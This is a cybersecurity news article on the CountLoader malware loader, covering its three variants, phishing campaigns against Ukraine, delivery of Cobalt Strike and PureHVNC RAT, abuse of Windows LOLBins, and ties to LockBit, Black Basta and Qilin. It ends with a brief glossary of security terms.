Fast Facts

• CountLoader comes in three forms: .NET, PowerShell, and JavaScript.
• Targets include Ukraine, with phishing lures impersonating local police.
• Delivers notorious hacking tools like Cobalt Strike and PureHVNC RAT.
• Uses Windows “Living-Off-the-Land” tools to evade detection.
• Linked to major ransomware groups including LockBit, Black Basta, and Qilin.

The New Swiss Army Knife of Russian Cybercrime

Imagine a digital crowbar that can slip into almost any window. That’s CountLoader - a versatile malware loader now empowering some of Russia’s most infamous ransomware gangs. First flagged by cybersecurity researchers in 2024, CountLoader is no one-trick pony: it arrives in three distinct flavors - .NET, PowerShell, and JavaScript - each tailored to sneak past defenses and drop a host of hacking tools onto unsuspecting victims’ computers.

How the Attack Unfolds

Recent campaigns have targeted individuals in Ukraine, using fake police documents to trick victims into opening malicious PDFs. Once inside, CountLoader can deliver post-exploitation tools like Cobalt Strike - a favorite for hackers seeking to control compromised machines - and PureHVNC RAT, a remote access trojan that gives attackers hands-on control. The loader even sets up shop in the victim’s Music folder, hiding in plain sight as it waits for further instructions.

The JavaScript version is the most advanced, offering multiple download and execution methods, and even masquerading as a legitimate Google Chrome update task to blend in. By leveraging built-in Windows tools like certutil and bitsadmin - so-called “Living-Off-the-Land Binaries” (LOLBins) - CountLoader sidesteps many traditional security filters, much like a burglar using the homeowner’s own keys.

Inside the Russian Ransomware Ecosystem

CountLoader is more than just a new tool; it’s a sign of how Russia’s cybercrime scene is evolving. The loader is linked to heavyweights like LockBit, Black Basta, and Qilin, but allegiance to any single group is fleeting. As investigators from DomainTools note, these hackers are opportunists, switching teams and tools as the market - and law enforcement - shift. The real asset is not the malware, but the people behind the keyboards and their trusted networks.

These attacks are part of a broader pattern. In recent years, Russia-affiliated groups have repeatedly targeted Ukraine and other nations with hybrid campaigns blending ransomware with espionage. The use of social engineering - such as fake job offers or police notices - remains a potent entry point, as seen in other campaigns like the infamous NotPetya attack in 2017.

What’s Next?

With CountLoader’s modular design and ability to adapt, defenders face a moving target. The loader’s use of everyday system tools and cloud services like GitHub to host malicious payloads makes it especially slippery. Its rapid adoption signals a new phase in ransomware operations - one where agility and trust networks matter more than any single piece of code.

WIKICROOK

• Loader: A loader is malicious software that installs or runs other malware on an infected system, enabling further cyberattacks or unauthorized access.
• RAT (Remote Access Trojan): A RAT (Remote Access Trojan) is malware that lets attackers secretly control a victim’s device remotely, accessing files and system functions.
• LOLBins: LOLBins are legitimate Windows tools that hackers abuse to perform malicious tasks, helping them evade security detection and blend in with normal activity.
• Phishing: Phishing is a cybercrime where attackers send fake messages to trick users into revealing sensitive data or clicking malicious links.
• Cobalt Strike: Cobalt Strike is a security testing tool often misused by hackers to launch real cyberattacks, making it a major concern in cybersecurity.